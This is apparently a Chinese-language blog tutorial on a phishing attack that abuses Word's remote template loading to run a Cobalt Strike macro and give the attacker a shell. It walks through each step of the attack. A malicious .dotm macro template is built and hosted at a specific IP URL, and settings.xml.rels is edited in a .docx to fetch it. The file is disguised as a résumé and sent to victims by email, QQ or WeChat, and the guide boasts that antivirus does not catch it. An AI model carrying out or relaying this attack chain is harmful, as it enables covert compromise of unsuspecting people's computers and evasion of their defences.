钓鱼攻击之远程加载恶意Word模版文件上线CS

0x00 前言

利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的，所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器请求恶意模板并执行恶意模板上的恶意代码。
这里，我们借助CobaltStrike生成office宏病毒，在将恶意宏嵌入到Word模板中，诱使受害者远程打开并加载带有宏的恶意Word模版，至目标主机成功上线CobaltStrike。

缺点：目标主机的网速决定了加载远程模版的速度。有可能文件打开的会特别慢(例如将远程模版放在github)，受害者可能在文件打开一半的时候强制关闭word。加载位于github上的恶意模板内容，有点慢，我们可以放在vps上，这样速度就快些了。

优点：因为是远程加载，所以免杀效果十分不错。基本不会被杀毒软件拦截。

0x01 操作演示

第一步：制作一个恶意的模版并确保能够上线
这里以cs的宏木马为例。
依次点击攻击——>生成后门——>MS Office Macro：

然后选择一个监听器，点击Generate：

然后点击Copy Macro：

此时便将恶意的VB代码获取到了剪切板中。
然后打开word编辑器，在工具栏的空白区域右键，点击自定义功能区：

勾选开发工具选项：

此时就会出现开发工具这一栏，并点击开发工具中的“Visual basic”：

将恶意代码复制到project的指定地点如下图所示：

然后保存关闭代码框，将这个word文件另存为一个启用宏的word模版文件(*.dotm)：

这时候可以先测试一下模版能否上线，操作为在模版文件上右键打开，双击是无法打开模版文件的，在模版文件上双击默认是以此模版创建新文件，切记。
右键打开后，CS成功上线：

第二步：制作远程加载恶意宏模版的docx文件
1.将恶意文件上传到服务器
首先将刚才已经制作好的含有恶意代码的模版文件上传到服务器上

开启监听，并在url后面加上?raw=true

http://22.124.56.238:8999/Doc1.dotm?raw=true

2.加载服务器上的恶意文件
打开word找一个任意的模版双击使用

将文件后缀改为zip

将其解压缩：

进入word文件夹中的_rels，找到settings.xml.rels文件

编辑这个文件，将其的target属性的值改为我们上面的那个url，也就是http://22.124.56.238:8999/Doc1.dotm?raw=true

接下来将刚才解压生成的文件压缩回去：

并且将生成的压缩文件改名为后缀名为docx的文件。

将最终生成的恶意文件——我的简历.docx用邮箱钓鱼、qq或微信文件发送给受害者，当受害者双击打开“我的简历.docx”文件是，恶意代码会执行，目标主机会上线

火绒查杀，并未发现

注意：将该恶意文档发给其他人，只要他是用word打开（wps不行），并且开启了宏，我们的CS就会收到弹回来的shell。
word开启或禁用宏：文件——>选项——>信任中心——>信任中心设置

默认情况下是“禁用所有宏，并发出通知”，这种情况下，当我们打开恶意文件时，会询问你是否“启用内容”：

这时，受害者只有点击了“启用内容”后恶意代码才会执行，目标主机才能上线（当然对方主机如果安装了杀软，如果进行注入，杀软会进行动态查杀，恶意文件将不会起作用）。

参考文章：钓鱼攻击：远程加载恶意Word模版文件上线CS